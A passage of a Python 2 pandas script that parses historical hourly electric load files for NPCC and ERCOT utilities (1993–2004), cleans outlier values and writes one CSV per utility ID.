1994 : pd.read_fwf('%s/npcc/1994/CHGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/CHGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/CHGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
1997 : pd.read_csv('%s/npcc/1997/CHGE97' % (fulldir), sep ='\s', skipinitialspace=True, header=None, skipfooter=1).iloc[:, 4:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/CHGE98' % (fulldir), skipfooter=1, header=None).iloc[:, 2:].values.ravel(),
},
3266 : {
1993 : pd.read_fwf('%s/npcc/1993/CMP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/CMP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/CMP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/CMP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/CMP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/CMP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/npcc/2002/CMP02' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/CMP03' % (fulldir), header=None).iloc[:, 1:].values.ravel()
},
4226 : {
1993 : pd.read_csv('%s/npcc/1993/COED93' % (fulldir), skipfooter=1, skiprows=11, header=None, skipinitialspace=True, sep=' ')[2].values,
1994 : pd.read_fwf('%s/npcc/1994/COED94' % (fulldir), skipfooter=1, header=None)[1].values,
1995 : pd.read_csv('%s/npcc/1995/COED95' % (fulldir), skiprows=3, header=None),
1996 : pd.read_excel('%s/npcc/1996/COED96' % (fulldir)).iloc[:, -1].values.ravel(),
1997 : pd.read_excel('%s/npcc/1997/COED97' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/COED98' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/COED99' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].str.replace(',', '').astype(int).values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/COED00' % (fulldir), sep='\t')[' Load '].dropna().str.replace(',', '').astype(int).values.ravel(),
2001 : pd.read_csv('%s/npcc/2001/COED01' % (fulldir), sep='\t', skipfooter=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/COED02' % (fulldir), sep='\t', skipfooter=1, skiprows=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
2003 : pd.read_csv('%s/npcc/2003/COED03' % (fulldir), sep='\t')['Load'].dropna().astype(int).values.ravel(),
2004 : pd.read_csv('%s/npcc/2004/COED04' % (fulldir), header=None).iloc[:, -1].str.replace('[A-Z,]', '').str.replace('\s', '0').astype(int).values.ravel()
},
4089 : {
1993 : pd.read_fwf('%s/npcc/1993/COEL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/COEL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/COEL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[3].values,
1997 : pd.read_csv('%s/npcc/1997/COEL97' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
1998 : pd.read_csv('%s/npcc/1998/COEL98' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
1999 : pd.read_csv('%s/npcc/1999/COEL99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2000 : pd.read_csv('%s/npcc/2000/COEL00' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2001 : pd.read_csv('%s/npcc/2001/COEL01' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2002 : pd.read_csv('%s/npcc/2002/COEL02' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2003 : pd.read_csv('%s/npcc/2003/COEL03' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
2004 : pd.read_csv('%s/npcc/2004/COEL04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values
},
3292 : {
1995 : pd.read_fwf('%s/npcc/1995/CVPS95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/CVPS96' % (fulldir), header=None, skipfooter=1)[1].values,
1997 : pd.read_csv('%s/npcc/1997/CVPS97' % (fulldir), header=None)[2].values,
1998 : pd.read_csv('%s/npcc/1998/CVPS98' % (fulldir), header=None, skipfooter=1)[4].values,
1999 : pd.read_csv('%s/npcc/1999/CVPS99' % (fulldir))['Load'].values
},
5618 : {
1993 : pd.read_fwf('%s/npcc/1993/EUA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/EUA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/EUA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/EUA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/EUA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/EUA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
7601 : {
1993 : pd.read_csv('%s/npcc/1993/GMP93' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4)[0].replace('MWH', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/GMP94' % (fulldir), header=None)[0].values,
1995 : pd.read_csv('%s/npcc/1995/GMP95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[0].values,
1996 : pd.read_csv('%s/npcc/1996/GMP96' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
1997 : pd.read_csv('%s/npcc/1997/GMP97' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
1998 : pd.read_csv('%s/npcc/1998/GMP98' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].astype(str).str[:3].astype(float).values,
1999 : pd.read_csv('%s/npcc/1999/GMP99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skipfooter=1).iloc[:8760, 0].values,
2002 : pd.read_excel('%s/npcc/2002/GMP02' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
2003 : pd.read_excel('%s/npcc/2003/GMP03' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
2004 : pd.read_csv('%s/npcc/2004/GMP04' % (fulldir), skiprows=13, sep='\s').iloc[:, 0].values
},
13501 : {
2002 : pd.read_csv('%s/npcc/2002/ISONY02' % (fulldir), sep='\t')['mw'].values,
2003 : pd.read_excel('%s/npcc/2003/ISONY03' % (fulldir))['Load'].values,
2004 : pd.read_excel('%s/npcc/2004/ISONY04' % (fulldir)).loc[:, 'HR1':].values.ravel()
},
11171 : {
1994 : pd.read_fwf('%s/npcc/1994/LILC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/LILC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/LILC97' % (fulldir), skiprows=4, widths=[8,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
},
11806 : {
1998 : pd.read_fwf('%s/npcc/1998/MMWE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/MMWE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2000 : pd.read_fwf('%s/npcc/2000/MMWE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/npcc/2001/MMWE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/npcc/2002/MMWE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/MMWE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
2004 : pd.read_fwf('%s/npcc/2004/MMWE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel()
},
13433 : {
1993 : pd.read_fwf('%s/npcc/1993/NEES93' % (fulldir), widths=(8,7), header=None, skipfooter=1)[1].values,
1994 : pd.read_csv('%s/npcc/1994/NEES94' % (fulldir), header=None, skipfooter=1, sep=' ', skipinitialspace=True)[3].values
},
13435 : {
1993 : pd.read_fwf('%s/npcc/1993/NEPOOL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/npcc/1994/NEPOOL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/NEPOOL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=3).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/NEPOOL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
1997 : pd.read_fwf('%s/npcc/1997/NEPOOL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/NEPOOL98' % (fulldir), header=None).iloc[:, 5:17].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/NEPOOL99' % (fulldir), engine='python', skiprows=1).iloc[:, 0].values,
2000 : pd.read_fwf('%s/npcc/2000/NEPOOL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/npcc/2001/NEPOOL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/NEPOOL02' % (fulldir), sep='\t').iloc[:, 3:].values.ravel(),
2003 : pd.read_fwf('%s/npcc/2003/NEPOOL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2004 : pd.read_csv('%s/npcc/2004/NEPOOL04' % (fulldir), sep='\t', header=None, skiprows=10).iloc[:, 5:].values.ravel()
},
13573 : {
1993 : pd.read_csv('%s/npcc/1993/NMPC93' % (fulldir), skiprows=11, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:27].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/NMPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/NMPC96' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
1998 : pd.read_fwf('%s/npcc/1998/NMPC98' % (fulldir), header=None).iloc[:, 2:].astype(int).values.ravel(),
1999 : pd.read_fwf('%s/npcc/1999/NMPC99' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
2000 : pd.read_excel('%s/npcc/2000/NMPC00' % (fulldir), sheetname=1, skiprows=10, skipfooter=3).iloc[:, 1:].values.ravel(),
2002 : pd.read_excel('%s/npcc/2002/NMPC02' % (fulldir), sheetname=1, skiprows=2, header=None).iloc[:, 2:].values.ravel(),
2003 : pd.concat([pd.read_excel('%s/npcc/2003/NMPC03' % (fulldir), sheetname=i, skiprows=1, header=None) for i in range(1,13)]).iloc[:, 2:].astype(str).apply(lambda x: x.str[:4]).astype(float).values.ravel()
},
13556 : {
1993 : pd.read_fwf('%s/npcc/1993/NU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_excel('%s/npcc/1994/NU94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
1995 : pd.read_excel('%s/npcc/1995/NU95' % (fulldir), header=None, skipfooter=5).dropna(how='any').iloc[:, 3:].values.ravel(),
1996 : pd.read_excel('%s/npcc/1996/NU96' % (fulldir), header=None, skipfooter=1).iloc[:, 5:].values.ravel(),
1997 : pd.read_excel('%s/npcc/1997/NU97' % (fulldir), header=None, skipfooter=4).iloc[:, 5:].values.ravel(),
1998 : pd.read_excel('%s/npcc/1998/NU98' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NU99' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NU00' % (fulldir), sep='\t', header=None).iloc[:, 5:].values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/NU01' % (fulldir)).iloc[:, -1].values,
2002 : pd.read_excel('%s/npcc/2002/NU02' % (fulldir)).iloc[:, -1].values,
2003 : pd.read_excel('%s/npcc/2003/NU03' % (fulldir), skipfooter=1).iloc[:, -1].values
},
15296 : {
1993 : pd.read_csv('%s/npcc/1993/NYPA93' % (fulldir), engine='python', header=None).values.ravel(),
1994 : pd.read_csv('%s/npcc/1994/NYPA94' % (fulldir), engine='python', header=None).values.ravel(),
1995 : pd.read_csv('%s/npcc/1995/NYPA95' % (fulldir), engine='python', header=None).values.ravel(),
1996 : pd.read_csv('%s/npcc/1996/NYPA96' % (fulldir), engine='python', header=None).values.ravel(),
1997 : pd.read_csv('%s/npcc/1997/NYPA97' % (fulldir), engine='python', header=None).values.ravel(),
1998 : pd.read_csv('%s/npcc/1998/NYPA98' % (fulldir), engine='python', header=None).values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NYPA99' % (fulldir), header=None).values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NYPA00' % (fulldir), engine='python', header=None).values.ravel(),
2001 : pd.read_csv('%s/npcc/2001/NYPA01' % (fulldir), engine='python', header=None).values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/NYPA02' % (fulldir), engine='python', header=None).values.ravel(),
2003 : pd.read_csv('%s/npcc/2003/NYPA03' % (fulldir), engine='python', header=None).values.ravel()
},
13501 : {
1993 : pd.read_fwf('%s/npcc/1993/NYPP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
},
13511 : {
1996 : pd.read_fwf('%s/npcc/1996/NYS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/npcc/1997/NYS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1999 : pd.read_excel('%s/npcc/1999/NYS99' % (fulldir)).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/NYS00' % (fulldir), sep='\t').iloc[:, -1].values,
2001 : pd.read_csv('%s/npcc/2001/NYS01' % (fulldir), sep='\t', skiprows=3).dropna(how='all').iloc[:, -1].values,
2002 : pd.read_csv('%s/npcc/2002/NYS02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3).iloc[:, 2].values,
2003 : pd.read_csv('%s/npcc/2003/NYS03' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:, -1].values,
2004 : pd.read_csv('%s/npcc/2004/NYS04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).dropna(how='all').iloc[:, -1].values
},
14154 : {
1993 : pd.read_csv('%s/npcc/1993/OR93' % (fulldir), skiprows=5, header=None).iloc[:, 2:26].values.ravel(),
1995 : (pd.read_csv('%s/npcc/1995/OR95' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1996 : (pd.read_csv('%s/npcc/1996/OR96' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1997 : (pd.read_csv('%s/npcc/1997/OR97' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
1998 : pd.read_fwf('%s/npcc/1998/OR98' % (fulldir), skiprows=1, header=None).dropna(axis=1, how='all').iloc[:, 1:].values.ravel(),
1999 : pd.read_csv('%s/npcc/1999/OR99' % (fulldir), sep='\t', skiprows=1, header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_csv('%s/npcc/2000/OR00' % (fulldir), sep='\t').iloc[:, -1].values.astype(int).ravel(),
2002 : pd.read_csv('%s/npcc/2002/OR02' % (fulldir), sep='\t', skiprows=2).iloc[:, -1].dropna().values.astype(int).ravel(),
2003 : pd.read_csv('%s/npcc/2003/OR03' % (fulldir), sep='\t').iloc[:, -1].dropna().values.astype(int).ravel(),
2004 : pd.read_csv('%s/npcc/2004/OR04' % (fulldir), header=None).iloc[:, -1].values.astype(int).ravel()
},
16183 : {
1994 : pd.read_fwf('%s/npcc/1994/RGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/npcc/1995/RGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/npcc/1996/RGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2002 : pd.read_csv('%s/npcc/2002/RGE02' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
2003 : pd.read_csv('%s/npcc/2003/RGE03' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
2004 : pd.read_csv('%s/npcc/2004/RGE04' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values
},
19497 : {
1993 : pd.read_fwf('%s/npcc/1993/UI93' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1994 : pd.read_fwf('%s/npcc/1994/UI94' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1995 : pd.read_fwf('%s/npcc/1995/UI95' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1996 : pd.read_fwf('%s/npcc/1996/UI96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1997 : pd.read_fwf('%s/npcc/1997/UI97' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
1998 : pd.read_excel('%s/npcc/1998/UI98' % (fulldir))['MW'].values,
1999 : pd.read_excel('%s/npcc/1999/UI99' % (fulldir)).loc[:, 'HR1':'HR24'].values.ravel(),
2001 : pd.read_excel('%s/npcc/2001/UI01' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
2002 : pd.read_excel('%s/npcc/2002/UI02' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
2003 : pd.read_excel('%s/npcc/2003/UI03' % (fulldir), sheetname=0, skipfooter=2).ix[:, 'HR1':'HR24'].values.ravel(),
2004 : pd.read_excel('%s/npcc/2004/UI04' % (fulldir), sheetname=0, skipfooter=1).ix[:, 'HR1':'HR24'].values.ravel()
}
}
npcc[4226][1995] = pd.concat([npcc[4226][1995][2].dropna(), npcc[4226][1995][6]]).values.ravel()
npcc[3249][1994][npcc[3249][1994] > 5000] = 0
npcc[3249][1996][npcc[3249][1996] > 5000] = 0
npcc[15296][2000][npcc[15296][2000] > 5000] = 0
npcc[15296][2001][npcc[15296][2001] > 5000] = 0
npcc[4089][1998] = np.repeat(np.nan, len(npcc[4089][1998]))
npcc[13511][1996][npcc[13511][1996] < 500] = 0
npcc[13511][1997][npcc[13511][1997] < 500] = 0
npcc[13511][1999][npcc[13511][1999] < 500] = 0
npcc[13511][2000][npcc[13511][2000] < 500] = 0
npcc[14154][2002][npcc[14154][2002] > 2000] = 0
if not os.path.exists('./npcc'):
os.mkdir('npcc')
for k in npcc.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(npcc[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(npcc[k][i]))) for i in npcc[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].replace('.', '0').astype(float).replace(0, np.nan)
s.to_csv('./npcc/%s.csv' % k)
###### ERCOT
# AUST: 1015
# CPL: 3278
# HLP: 8901
# LCRA: 11269
# NTEC: 13670
# PUB: 2409
# SRGT: 40233
# STEC: 17583
# TUEC: 44372
# TMPP: 18715
# TXLA: 18679
# WTU: 20404
ercot = {
1015 : {
1993 : pd.read_fwf('%s/ercot/1993/AUST93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/AUST94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/AUST95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/AUST96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/AUST97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['AENX'].loc[2:].astype(float)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['AENX'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[3].str.replace(',', '').astype(float)/1000).values
},
3278 : {
1993 : pd.read_fwf('%s/ercot/1993/CPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/CPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/CPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/CPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['CPLC'].loc[2:].astype(int)/1000).values
},
8901 : {
1993 : pd.read_fwf('%s/ercot/1993/HLP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/HLP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/HLP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/HLP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/HLP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['HLPC'].loc[2:].astype(int)/1000).values
},
11269: {
1993 : pd.read_fwf('%s/ercot/1993/LCRA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_csv('%s/ercot/1994/LCRA94' % (fulldir), skiprows=4).iloc[:, -1].values,
1995 : pd.read_fwf('%s/ercot/1995/LCRA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/LCRA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/LCR97' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['LCRA'].loc[2:].astype(int)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['LCRA'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[6].str.replace(',', '').astype(float)/1000).values
},
13670 : {
1993 : pd.read_csv('%s/ercot/1993/NTEC93' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
1994 : pd.read_fwf('%s/ercot/1994/NTEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/NTEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/NTEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/NTEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
2001 : pd.read_fwf('%s/ercot/2001/NTEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel()
},
2409 : {
1993 : pd.read_fwf('%s/ercot/1993/PUB93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/ercot/1994/PUB94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/ercot/1995/PUB95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/ercot/1996/PUB96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1997 : pd.read_fwf('%s/ercot/1997/PUB97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
1998 : (pd.read_excel('%s/ercot/1998/FERC714.xls' % (fulldir), skiprows=3)['PUBX'].loc[2:].astype(int)/1000).values,
1999 : (pd.read_excel('%s/ercot/1999/ERCOT99HRLD060800.xls' % (fulldir), skiprows=14)['PUBX'].astype(float)/1000).values,
2000 : (pd.read_csv('%s/ercot/2000/ERCOT00HRLD.txt' % (fulldir), skiprows=18, header=None, skipinitialspace=True, sep='\t')[7].str.replace(',', '').astype(float)/1000).values
},
40233 : {
